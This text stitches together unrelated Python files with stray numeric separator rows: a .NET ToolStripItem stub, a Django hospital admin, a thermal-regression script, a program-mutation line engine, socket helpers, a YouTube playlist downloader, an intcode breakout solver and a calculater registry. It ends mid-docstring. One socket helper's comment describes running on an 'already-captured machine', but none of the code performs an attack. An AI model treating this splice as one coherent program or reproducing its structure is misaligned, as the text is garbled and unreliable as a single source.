Available=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether the System.Windows.Forms.ToolStripItem should be placed on a System.Windows.Forms.ToolStrip.
Get: Available(self: ToolStripItem) -> bool
Set: Available(self: ToolStripItem)=value
"""
BackColor=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the background color for the item.
Get: BackColor(self: ToolStripItem) -> Color
Set: BackColor(self: ToolStripItem)=value
"""
BackgroundImage=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the background image displayed in the item.
Get: BackgroundImage(self: ToolStripItem) -> Image
Set: BackgroundImage(self: ToolStripItem)=value
"""
BackgroundImageLayout=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the background image layout used for the System.Windows.Forms.ToolStripItem.
Get: BackgroundImageLayout(self: ToolStripItem) -> ImageLayout
Set: BackgroundImageLayout(self: ToolStripItem)=value
"""
Bounds=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the size and location of the item.
Get: Bounds(self: ToolStripItem) -> Rectangle
"""
CanRaiseEvents=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the component can raise an event.
"""
CanSelect=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the item can be selected.
Get: CanSelect(self: ToolStripItem) -> bool
"""
ContentRectangle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the area where content,such as text and icons,can be placed within a System.Windows.Forms.ToolStripItem without overwriting background borders.
Get: ContentRectangle(self: ToolStripItem) -> Rectangle
"""
DefaultAutoToolTip=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether to display the System.Windows.Forms.ToolTip that is defined as the default.
"""
DefaultDisplayStyle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating what is displayed on the System.Windows.Forms.ToolStripItem.
"""
DefaultMargin=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the default margin of an item.
"""
DefaultPadding=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the internal spacing characteristics of the item.
"""
DefaultSize=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the default size of the item.
"""
DesignMode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value that indicates whether the System.ComponentModel.Component is currently in design mode.
"""
DismissWhenClicked=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether items on a System.Windows.Forms.ToolStripDropDown are hidden after they are clicked.
"""
DisplayStyle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets whether text and images are displayed on a System.Windows.Forms.ToolStripItem.
Get: DisplayStyle(self: ToolStripItem) -> ToolStripItemDisplayStyle
Set: DisplayStyle(self: ToolStripItem)=value
"""
Dock=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets which System.Windows.Forms.ToolStripItem borders are docked to its parent control and determines how a System.Windows.Forms.ToolStripItem is resized with its parent.
Get: Dock(self: ToolStripItem) -> DockStyle
Set: Dock(self: ToolStripItem)=value
"""
DoubleClickEnabled=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether the System.Windows.Forms.ToolStripItem can be activated by double-clicking the mouse.
Get: DoubleClickEnabled(self: ToolStripItem) -> bool
Set: DoubleClickEnabled(self: ToolStripItem)=value
"""
Enabled=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether the parent control of the System.Windows.Forms.ToolStripItem is enabled.
Get: Enabled(self: ToolStripItem) -> bool
Set: Enabled(self: ToolStripItem)=value
"""
Events=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the list of event handlers that are attached to this System.ComponentModel.Component.
"""
Font=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the font of the text displayed by the item.
Get: Font(self: ToolStripItem) -> Font
Set: Font(self: ToolStripItem)=value
"""
ForeColor=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the foreground color of the item.
Get: ForeColor(self: ToolStripItem) -> Color
Set: ForeColor(self: ToolStripItem)=value
"""
Height=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the height,in pixels,of a System.Windows.Forms.ToolStripItem.
Get: Height(self: ToolStripItem) -> int
Set: Height(self: ToolStripItem)=value
"""
Image=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the image that is displayed on a System.Windows.Forms.ToolStripItem.
Get: Image(self: ToolStripItem) -> Image
Set: Image(self: ToolStripItem)=value
"""
ImageAlign=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the alignment of the image on a System.Windows.Forms.ToolStripItem.
Get: ImageAlign(self: ToolStripItem) -> ContentAlignment
Set: ImageAlign(self: ToolStripItem)=value
"""
ImageIndex=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the index value of the image that is displayed on the item.
Get: ImageIndex(self: ToolStripItem) -> int
Set: ImageIndex(self: ToolStripItem)=value
"""
ImageKey=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the key accessor for the image in the System.Windows.Forms.ToolStrip.ImageList that is displayed on a System.Windows.Forms.ToolStripItem.
Get: ImageKey(self: ToolStripItem) -> str
Set: ImageKey(self: ToolStripItem)=value
"""
ImageScaling=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether an image on a System.Windows.Forms.ToolStripItem is automatically resized to fit in a container.
Get: ImageScaling(self: ToolStripItem) -> ToolStripItemImageScaling
Set: ImageScaling(self: ToolStripItem)=value
"""
ImageTransparentColor=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the color to treat as transparent in a System.Windows.Forms.ToolStripItem image.
Get: ImageTransparentColor(self: ToolStripItem) -> Color
Set: ImageTransparentColor(self: ToolStripItem)=value
"""
IsDisposed=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the object has been disposed of.
Get: IsDisposed(self: ToolStripItem) -> bool
"""
IsOnDropDown=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the container of the current System.Windows.Forms.Control is a System.Windows.Forms.ToolStripDropDown.
Get: IsOnDropDown(self: ToolStripItem) -> bool
"""
IsOnOverflow=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the System.Windows.Forms.ToolStripItem.Placement property is set to System.Windows.Forms.ToolStripItemPlacement.Overflow.
Get: IsOnOverflow(self: ToolStripItem) -> bool
"""
Margin=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the space between the item and adjacent items.
Get: Margin(self: ToolStripItem) -> Padding
Set: Margin(self: ToolStripItem)=value
"""
MergeAction=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets how child menus are merged with parent menus.
Get: MergeAction(self: ToolStripItem) -> MergeAction
Set: MergeAction(self: ToolStripItem)=value
"""
MergeIndex=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the position of a merged item within the current System.Windows.Forms.ToolStrip.
Get: MergeIndex(self: ToolStripItem) -> int
Set: MergeIndex(self: ToolStripItem)=value
"""
Name=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the name of the item.
Get: Name(self: ToolStripItem) -> str
Set: Name(self: ToolStripItem)=value
"""
Overflow=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets whether the item is attached to the System.Windows.Forms.ToolStrip or System.Windows.Forms.ToolStripOverflowButton or can float between the two.
Get: Overflow(self: ToolStripItem) -> ToolStripItemOverflow
Set: Overflow(self: ToolStripItem)=value
"""
Owner=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the owner of this item.
Get: Owner(self: ToolStripItem) -> ToolStrip
Set: Owner(self: ToolStripItem)=value
"""
OwnerItem=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the parent System.Windows.Forms.ToolStripItem of this System.Windows.Forms.ToolStripItem.
Get: OwnerItem(self: ToolStripItem) -> ToolStripItem
"""
Padding=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the internal spacing,in pixels,between the item's contents and its edges.
Get: Padding(self: ToolStripItem) -> Padding
Set: Padding(self: ToolStripItem)=value
"""
Parent=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the parent container of the System.Windows.Forms.ToolStripItem.
"""
Placement=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the current layout of the item.
Get: Placement(self: ToolStripItem) -> ToolStripItemPlacement
"""
Pressed=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the state of the item is pressed.
Get: Pressed(self: ToolStripItem) -> bool
"""
RightToLeft=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether items are to be placed from right to left and text is to be written from right to left.
Get: RightToLeft(self: ToolStripItem) -> RightToLeft
Set: RightToLeft(self: ToolStripItem)=value
"""
RightToLeftAutoMirrorImage=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Mirrors automatically the System.Windows.Forms.ToolStripItem image when the System.Windows.Forms.ToolStripItem.RightToLeft property is set to System.Windows.Forms.RightToLeft.Yes.
Get: RightToLeftAutoMirrorImage(self: ToolStripItem) -> bool
Set: RightToLeftAutoMirrorImage(self: ToolStripItem)=value
"""
Selected=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the item is selected.
Get: Selected(self: ToolStripItem) -> bool
"""
ShowKeyboardCues=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether to show or hide shortcut keys.
"""
Size=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the size of the item.
Get: Size(self: ToolStripItem) -> Size
Set: Size(self: ToolStripItem)=value
"""
Tag=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the object that contains data about the item.
Get: Tag(self: ToolStripItem) -> object
Set: Tag(self: ToolStripItem)=value
"""
Text=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the text that is to be displayed on the item.
Get: Text(self: ToolStripItem) -> str
Set: Text(self: ToolStripItem)=value
"""
TextAlign=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the alignment of the text on a System.Windows.Forms.ToolStripLabel.
Get: TextAlign(self: ToolStripItem) -> ContentAlignment
Set: TextAlign(self: ToolStripItem)=value
"""
TextDirection=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the orientation of text used on a System.Windows.Forms.ToolStripItem.
Get: TextDirection(self: ToolStripItem) -> ToolStripTextDirection
Set: TextDirection(self: ToolStripItem)=value
"""
TextImageRelation=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the position of System.Windows.Forms.ToolStripItem text and image relative to each other.
Get: TextImageRelation(self: ToolStripItem) -> TextImageRelation
Set: TextImageRelation(self: ToolStripItem)=value
"""
ToolTipText=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the text that appears as a System.Windows.Forms.ToolTip for a control.
Get: ToolTipText(self: ToolStripItem) -> str
Set: ToolTipText(self: ToolStripItem)=value
"""
Visible=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether the item is displayed.
Get: Visible(self: ToolStripItem) -> bool
Set: Visible(self: ToolStripItem)=value
"""
Width=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the width in pixels of a System.Windows.Forms.ToolStripItem.
Get: Width(self: ToolStripItem) -> int
Set: Width(self: ToolStripItem)=value
"""
AvailableChanged=None
BackColorChanged=None
Click=None
DisplayStyleChanged=None
DoubleClick=None
DragDrop=None
DragEnter=None
DragLeave=None
DragOver=None
EnabledChanged=None
ForeColorChanged=None
GiveFeedback=None
LocationChanged=None
MouseDown=None
MouseEnter=None
MouseHover=None
MouseLeave=None
MouseMove=None
MouseUp=None
OwnerChanged=None
Paint=None
QueryAccessibilityHelp=None
QueryContinueDrag=None
RightToLeftChanged=None
TextChanged=None
ToolStripItemAccessibleObject=None
VisibleChanged=None
| 36,756 | 12,250 |
from django.contrib import admin
from apps.hospitals.models import Hospital, HospitalBed
class HospitalBedInline(admin.TabularInline):
    """Inline editor for HospitalBed rows shown on the Hospital admin page."""
    model = HospitalBed

    def get_extra(self, request, obj=None, **kwargs):
        """Offer 3 blank bed forms when creating a hospital, none when editing."""
        if obj:
            return 0
        return 3
class HospitalAdmin(admin.ModelAdmin):
    """Admin configuration for Hospital with inline bed editing."""
    empty_value_display = '--'
    fieldsets = [
        (None, {
            'fields': ['acronym', ('name', 'city'), ('phonenumber', 'email')],
            'classes': ('wide', 'extrapretty'),
        }),
    ]
    inlines = [HospitalBedInline]
    # list_display references the two formatter methods defined below by name.
    list_display = ['upper_case_acronym', 'upper_case_name', 'city', 'phonenumber', 'email']
    ordering = ['acronym', 'name']
    search_fields = ['acronym', 'name']
    autocomplete_fields = ['city']
    def upper_case_acronym(self, obj):
        # Display the acronym fully upper-cased in the change list.
        return obj.acronym.upper()
    upper_case_acronym.short_description = 'acronym'
    def upper_case_name(self, obj):
        # NOTE(review): capitalize() also lower-cases everything after the first
        # letter (e.g. "St. Mary" -> "St. mary") — confirm this is intended.
        return obj.name.capitalize()
    upper_case_name.short_description = 'name'
admin.site.register(Hospital, HospitalAdmin)
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 12 00:58:08 2018
@author: sohdesune
"""
'''
ln|T_w - T| - ln|T_w - T_amb| = -(1/tau) * t
1. Extract raw data for first 20s from csv
2. Plot complicated ln function vs t
3. Compute tau
4. [Remove outliers]
5. Write tau vs T_w to txt '''
from math import log as ln
from numpy import polyfit
'''============================================== Reading raw data from csv '''
# Ambient temperatures (one per run); index i pairs with T_w[i] and with the
# i-th time/temperature dataset read from the csv below.
T_amb = [26.375, 26.687, 28.312, 25.562, 28.312, 27.062, 31.125, 31.750,
         28.625, 29.687, 26.375, 28.062, 30.125, 25.625, 27.250, 29.687,
         31.125, 26.125, 33.437, 30.000, 27.000, 24.687, 31.000, 33.500,
         33.187, 32.937, 29.500, 29.062, 28.062, 30.375, 30.437, 26.687,
         32.312, 30.937, 23.937, 27.500, 32.125, 31.125, 32.250, 31.875,
         25.250, 29.375, 34.312, 24.250, 31.750, 30.875, 29.687, 31.812,
         30.875, 32.562, 30.812, 26.875, 33.187, 31.062, 25.062, 31.312]
# Water temperatures T_w, one per measurement set, in ascending order.
T_w = [11.8, 11.8, 12.6, 12.6, 12.6, 13.2, 13.3, 13.3, 14.3, 14.3, 14.3, 16.0,
       16.1, 17.4, 17.4, 18.8, 18.9, 20.0, 21.3, 21.3, 21.3, 22.5, 22.9, 29.5,
       29.6, 29.8, 35.0, 35.3, 35.7, 37.4, 37.9, 38.5, 40.8, 41.3, 41.9, 43.6,
       43.9, 44.3, 46.3, 46.6, 47.0, 48.5, 48.8, 49.1, 50.1, 50.4, 50.9, 51.1,
       51.4, 51.7, 51.9, 52.3, 56.2, 56.7, 56.9, 57.4]
# Path placeholder: point this at the csv holding alternating time/temperature
# rows (semicolon-separated), one pair of rows per T_w set, blank row between.
data = 'directory to csv file with temp vs time data'
f = open(data, 'r')
print('\nReading data from csv file.')
print('Directory:\n{}\n'.format(data))
line = f.readline()
i = 0
all_results = []
#each entry: [T_w, T_amb, list of x values, list of y values]
#each while loop reads the time and temp data for one T_w set
while line != '':
    x_val = []
    y_val = []
    # First row of a set: the time samples.
    time = line.strip().split(';')
    for elem in time:
        x_val.append(float(elem))
    # Second row of the set: the temperature samples.
    line = f.readline()
    temp = line.strip().split(';')
    #compute ln values: ln|T_w - T| - ln|T_w - T_amb| (see header derivation)
    for elem in temp:
        try:
            value = ln(abs(T_w[i] - float(elem))) - ln(abs(T_w[i] - T_amb[i]))
        except ValueError:
            # ln(0) when T equals T_w exactly; substitute a large negative value.
            print('ValueError at T = {}'.format(elem))
            print('Occurred for T_w = {}, T_amb = {}'.format(T_w[i], T_amb[i]))
            value = ln(0.001)
        y_val.append(value)
    dataset = [x_val, y_val]
    all_results.append([T_w[i], T_amb[i], dataset])
    line = f.readline() #skip blank row
    line = f.readline()
    i += 1
f.close()
print('\nData compiled and modified into the complicated logarithm.')
'''====================================================== Performing linreg '''
linreg_results = []
#each entry: [T_w, gradient, y-intercept]
for result in all_results:
    # First-order polyfit: slope of ln-difference vs time gives -1/tau.
    grad, y_int = polyfit(result[2][0], result[2][1], 1)
    #print('T_w = {}: gradient {:+.3f}, y-intercept {:+.3f}'.format(result[0], grad, y_int))
    linreg_results.append([result[0], grad, y_int])
print('\nLinear regression performed for abovementioned logarithm vs time.')
'''========================================================= Determining tau'''
# tau = -1/gradient, per the model ln|T_w - T| - ln|T_w - T_amb| = -(1/tau)*t
tau = [(-1/item[1]) for item in linreg_results]
twater = [item[0] for item in linreg_results]
print('\nTau values computed.')
'''=================================================== Plot regression line '''
grad, y_int = polyfit(twater, tau, 1)
print('\nRegression line calculated for full data set of tau against T_water.')
print('Gradient: {:.3f} y-intercept: {:.3f}'.format(grad, y_int))
'''=========================== Remove anomalies and re-plot regression line '''
''' Perpendicular distance from a point to the line y = g*x + c:
    translate the line through the origin (subtract c from y), project the
    point onto y = g*x, then measure the Euclidean gap:
        x_proj = (x + g*(y - c)) / (1 + g^2),  y_proj = g*x_proj + c '''
def dist_from_regr(g, c, x, y):
    """Return the perpendicular distance from point (x, y) to the line y = g*x + c.

    g: gradient of the regression line
    c: y-intercept of the regression line
    x, y: coordinates of the point being tested
    """
    # Bug fix: the original used (x + g*y)/(1 + g**2), i.e. forgot to subtract
    # the intercept before projecting, which inflated distances (a point lying
    # exactly on a line with c != 0 reported a non-zero distance).
    x_proj = (x + g*(y - c)) / (1 + g**2)
    y_proj = g * x_proj + c
    distance = ((x-x_proj)**2 + (y-y_proj)**2)**0.5
    return distance
num_outliers = 0 #number of outliers you wish to remove
removed = 0
# Iteratively drop the single farthest point from the current regression line,
# refitting after each removal (no-op while num_outliers is 0).
while removed < num_outliers:
    dist_list = []
    for i in range(len(twater)):
        dist_list.append(dist_from_regr(grad, y_int, twater[i], tau[i]))
    m = dist_list.index(max(dist_list))
    m_twater = twater.pop(m)
    m_tau = tau.pop(m)
    print('\n{:.1f},{:.1f} removed for being {:.1f} away from regression line.'.format(
            m_twater, m_tau, dist_list[m]))
    grad, y_int = polyfit(twater, tau, 1)
    print('New regression line plotted after removing outlier.')
    removed += 1
print('\n========================================================\n\nRESULT\n')
print('{} outliers removed from original data.'.format(num_outliers))
grad, y_int = polyfit(twater, tau, 1)
print('Final regression line plotted from {} pairs of values.'.format(len(twater)))
print('Gradient: {:.3f} y-intercept: {:.3f}'.format(grad, y_int))
'''============================================= Write cleaned data to file '''
#send data to txt file to settle the remaining manipulations in Excel
def send_data():
    """Append the cleaned (twater, tau) pairs, one CSV line each, to a text file."""
    # Placeholder: set this to the destination text file before running.
    sendto = 'txt for writing to'
    f2 = open(sendto, 'a')
    for i in range(len(twater)):
        f2.write('{},{}\n'.format(twater[i], tau[i]))
    f2.close()
    print('\nCleaned data set written to text file for further processing.')
    print('Destination:\n{}'.format(sendto))
#checkpoint to ensure intentional writing
answer = input('Are you sure you want to write the results to txt? Y/N: ')
if answer == 'Y' or answer == 'y':
    send_data()
else:
    print('Data not written.')
from . import AbstractLineEngine
class LineEngine(AbstractLineEngine):
    """Line-granularity edit engine: files are lists of lines, edits replace,
    insert or blank out single lines identified by modification-point index."""
    @classmethod
    def get_contents(cls, file_path):
        """Read file_path and return its lines with trailing whitespace stripped."""
        with open(file_path, 'r') as target_file:
            return list(map(str.rstrip, target_file.readlines()))
    @classmethod
    def get_modification_points(cls, contents_of_file):
        """Every line index is an editable modification point."""
        return list(range(len(contents_of_file)))
    @classmethod
    def get_source(cls, program, file_name, index):
        """Return the original source line at (file_name, index)."""
        return program.contents[file_name][index]
    @classmethod
    def dump(cls, contents_of_file):
        """Serialize the line list back to file text with a trailing newline."""
        return '\n'.join(contents_of_file) + '\n'
    @classmethod
    def do_replace(cls, program, op, new_contents, modification_points):
        """Replace the target line with the ingredient line (or blank it)."""
        l_f, l_n = op.target # line file and line number
        if op.ingredient:
            i_f, i_n = op.ingredient
            new_contents[l_f][modification_points[l_f][l_n]] = program.contents[i_f][i_n]
        else:
            new_contents[l_f][modification_points[l_f][l_n]] = ''
        return True
    @classmethod
    def do_insert(cls, program, op, new_contents, modification_points):
        """Insert the ingredient line before/after the target line.

        After inserting, later modification points are shifted by one so that
        logical line numbers keep pointing at the same original lines; note
        the shift starts at l_n for 'before' but l_n + 1 for 'after'.
        """
        l_f, l_n = op.target
        i_f, i_n = op.ingredient
        if op.direction == 'before':
            new_contents[l_f].insert(
                modification_points[l_f][l_n],
                program.contents[i_f][i_n]
            )
            for i in range(l_n, len(modification_points[l_f])):
                modification_points[l_f][i] += 1
        elif op.direction == 'after':
            new_contents[l_f].insert(
                modification_points[l_f][l_n] + 1,
                program.contents[i_f][i_n]
            )
            for i in range(l_n + 1, len(modification_points[l_f])):
                modification_points[l_f][i] += 1
        return True
    @classmethod
    def do_delete(cls, program, op, new_contents, modification_points):
        """'Delete' the target line by blanking it, preserving line numbering."""
        l_f, l_n = op.target # line file and line number
        new_contents[l_f][modification_points[l_f][l_n]] = ''
        return True
| 1,987 | 646 |
#!/usr/bin/env python3
"""
Allan Millar
Various functions related to sockets, ip's, port's etc.
"""
import sys, random, socket
from contextlib import closing
def find_port():
    """Return a random high port on localhost that nothing is listening on.

    Runs on the already-captured machine itself.  A *closed* port is chosen
    deliberately so we never interfere with services already present.
    """
    host = "localhost"
    # Probe random ports until one refuses the connection attempt.
    while True:
        candidate = random.randint(10000, 65535)
        with closing(
            socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ) as probe:
            if probe.connect_ex((host, candidate)) != 0:
                # Nothing answered, so the port is free for our use.
                return candidate
            # Something is listening here; try another port.
def get_ip():
    """Return this machine's primary outbound IPv4 address as a string.

    Connecting a UDP socket does not send any packet; it merely makes the OS
    choose an outgoing interface, whose address we then read back.  Falls back
    to the loopback address on any socket failure.
    Technique from:
    https://stackoverflow.com/questions/166506/finding-local-ip-addresses-using-pythons-stdlib
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # doesn't even have to be reachable
        s.connect(('10.255.255.255', 1))
        IP = s.getsockname()[0]
    except OSError:
        # Bug fix: was a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit; all socket errors are OSError.
        IP = '127.0.0.1'
    finally:
        s.close()
    return IP
'''
created by Lautaro Silbergleit on 2021
'''
import re
from pytube import Playlist, YouTube
from tqdm import tqdm
from os import makedirs, listdir, remove
from os.path import join, exists, isfile
import json
from time import sleep
# Characters stripped from video titles before they are used as filenames.
SENSITIVE_CHARACTERS = ['%', ':']

def main():
    """Download every YouTube playlist listed in playlist_urls.json as .mp4 files.

    For each playlist: cache (url, title) pairs in a hidden json file, create a
    per-playlist directory, delete the most recent (possibly partial) download,
    then fetch every video that is not already on disk.
    """
    PLAYLIST_URL_PATH = 'playlist_urls.json'
    PLAYLIST_VIDEOS_URLS_PATH = '.playlist_videos_urls.json'
    PLAYLIST_DOWNLOAD_PATH = 'playlists'
    # First run: offer to create a template urls file, then exit.
    if not exists(PLAYLIST_URL_PATH):
        create = input(f"There's no file named {PLAYLIST_URL_PATH} in this directory\nDo you want to create one [y/n]")
        create = True if create in ['y', 'Y', 'yes', 'Yes'] else False
        if create:
            with open(PLAYLIST_URL_PATH, 'w') as f:
                json.dump(['playlist_url_1', 'playlist_url_2', 'playlist_url_3', '...'], f)
        return
    with open(PLAYLIST_URL_PATH, 'r') as f:
        playlist_urls = json.load(f)
    # create file with all video's urls
    if not exists(PLAYLIST_VIDEOS_URLS_PATH):
        with open(PLAYLIST_VIDEOS_URLS_PATH, 'w') as f:
            json.dump({}, f)
    assert isinstance(playlist_urls, list)
    for playlist_url in playlist_urls:  # for each playlist
        playlist = Playlist(playlist_url)
        # Work around pytube's stale playlist-page regex.
        playlist._video_regex = re.compile(r"\"url\":\"(/watch\?v=[\w-]*)")
        playlist_name = playlist.title
        print(f"\n Downloading playlist: '{playlist_name}'")
        # create playlist download directory
        path = join(PLAYLIST_DOWNLOAD_PATH, playlist.title)
        if not exists(path):
            makedirs(path)
        playlist_length = len(list(playlist.video_urls))
        with open(PLAYLIST_VIDEOS_URLS_PATH, 'r') as f:
            saved_urls = json.load(f)
        if not playlist_name in saved_urls:
            saved_urls[playlist_name] = []
        # Re-gather titles whenever the cached list is stale or incomplete.
        if len(saved_urls[playlist_name]) != playlist_length:
            saved_urls[playlist_name] = []
            print('Gathering video info...')
            for url in tqdm(list(playlist.video_urls)):
                youtube = YouTube(url)
                title = youtube.title
                for c in SENSITIVE_CHARACTERS:
                    title = title.replace(c, '')
                saved_urls[playlist_name].append({'url':url, 'title': title})
            with open(PLAYLIST_VIDEOS_URLS_PATH, 'w') as f:
                json.dump(saved_urls, f)
            print('done')
        # check downloads
        all_files = [join(path, f) for f in listdir(path) if isfile(join(path, f))]
        all_videos = [v for v in all_files if v.endswith('.mp4')]
        if len(all_videos) == len(saved_urls[playlist_name]): # if target video count matches video count, return
            print('All files were allready downloaded')
            continue
        removed_last = False
        if all_videos: # if at least one video was downloaded, delete last
            for obj in reversed(saved_urls[playlist_name]):
                if removed_last: break
                title = obj['title']
                # Removed leftover debug code here that printed 'hi' whenever
                # '78' appeared in both the title and the filename.
                for f in all_videos: # if any video matches the title, remove it since it was the last and download could not be complete
                    if title in f:
                        remove(f)
                        removed_last = True
                        print(f"Removed last incomplete download '{title}.mp4'")
                        break
        # download videos that weren't already downloaded
        print('Downloading...')
        for obj in tqdm(saved_urls[playlist_name]):
            url = obj['url']
            title = obj['title']
            p = join(path, f'{title}.mp4')
            # NOTE(review): video.download() names the file itself; if pytube's
            # sanitised title differs from ours, this existence check misses.
            if not exists(p):
                youtube = YouTube(url)
                video = youtube.streams.get_highest_resolution()
                video.download(path)
            else:
                sleep(.1)
        print('done')

if __name__ == '__main__':
    main()
| 3,339 | 1,355 |
import intcode
def breakout_demo(p):
    """Run the breakout intcode program with no input; count bricks drawn."""
    screen = {}
    cpu = intcode.computer(p)
    while True:
        try:
            x = next(cpu)
            y = next(cpu)
            tile = next(cpu)
        except StopIteration:
            # Program halted: the screen holds the final board.
            return bricks_remaining(screen)
        screen[x, y] = tile
def breakout(p):
    """Play breakout for free (memory[0]=2) with a trivial AI; return the final score."""
    p[0] = 2
    cpu = intcode.computer(p)
    screen = dict()
    joystick, paddle, ball = 0, None, None
    #print("\033[2J")
    while True:
        x = next(cpu)
        # The cpu generator yields None when it wants joystick input; feed it
        # the current joystick value via send(), which also yields the next x.
        if x is None: x = cpu.send(joystick)
        y = next(cpu)
        tile = next(cpu)
        screen[x,y] = tile
        # The (-1, 0) triple carries the score instead of a tile id.
        if x == -1 and y == 0 and bricks_remaining(screen) == 0:
            return tile # final score
        elif tile == 3:
            paddle = x
        elif tile == 4:
            ball = x
        # Simple AI: steer the paddle toward the ball's x position.
        if paddle is not None and ball is not None:
            joystick = -1 if ball < paddle else 1 if ball > paddle else 0
        #print("\033[H Score: %d" % screen.get((-1,0), 0))
        #for y in range(20):
        #    print("".join([" #.=O"[screen.get((x,y), 0)] for x in range(40)]))
def bricks_remaining(screen):
    """Count brick tiles (id 2) left on the screen dict of (x, y) -> tile."""
    # Sum over a generator instead of materialising a throwaway list; iterate
    # values directly instead of indexing back into the dict per key.
    return sum(1 for tile in screen.values() if tile == 2)
# Puzzle input is a single comma-separated intcode line; run both parts.
# Note breakout() mutates p[0], so part 1 must run first on the pristine copy.
with open("day13.txt") as fh:
    p = [int(c) for c in fh.readline().split(",")]
    print("2019 day 13 part 1: %d" % breakout_demo(p))
    print("2019 day 13 part 2: %d" % breakout(p))
| 1,344 | 500 |
# -*- coding: utf-8 -*-
# 18/8/15
# create by: snower
from .calculater import Calculater
from .builtin import *
from .conversion_calculater import ConvCalculater
from ..errors import CalculaterUnknownException
# Registry mapping calculater names (the prefix before '::' in expressions) to
# their implementing classes; extended at runtime via register_calculater().
CALCULATERS = {
    "": Calculater,
    "type": TypeCalculater,
    'range': RangeCalculater,
    "add": AddCalculater,
    "sub": SubCalculater,
    "mul": MulCalculater,
    "div": DivCalculater,
    "mod": ModCalculater,
    "bit": BitCalculater,
    "substring": SubstringCalculater,
    "split": SplitCalculater,
    "join": JoinCalculater,
    "now": NowCalculater,
    "gt": GtCalculater,
    "gte": GteCalculater,
    "lt": LtCalculater,
    "lte": LteCalculater,
    "eq": EqCalculater,
    "neq": NeqCalculater,
    "and": AndCalculater,
    "or": OrCalculater,
    "in": InCalculater,
    "max": MaxCalculater,
    "min": MinCalculater,
    "len": LenCalculater,
    "abs": AbsCalculater,
    "index": IndexCalculater,
    "filter": FilterCalculater,
    "sum": SumCalculater,
    "sort": SortCalculater,
    "string": StringCalculater,
    "array": ArrayCalculater,
    "map": MapCalculater,
    "math": MathCalculater,
    "hash": HashCalculater,
    "json": JsonCalculater,
    "struct": StructCalculater,
    "conv": ConvCalculater,
}
def find_calculater(name):
    """Look up a calculater class; names of the form 'base::suffix' use the base part.

    :raises CalculaterUnknownException: when no calculater is registered under the name.
    """
    base = name.split("::")[0]
    if base in CALCULATERS:
        return CALCULATERS[base]
    raise CalculaterUnknownException("%s is unknown calculater" % base)
def register_calculater(name, calculater):
    """Register a Calculater subclass under `name` and return it.

    :raises TypeError: if `calculater` is not a subclass of Calculater.
    """
    if issubclass(calculater, Calculater):
        CALCULATERS[name] = calculater
        return calculater
    raise TypeError("is not Calculater")
import math
import skimage.filters
def variance_difference(image_1, image_2):
    """Absolute difference between the variances of two images.

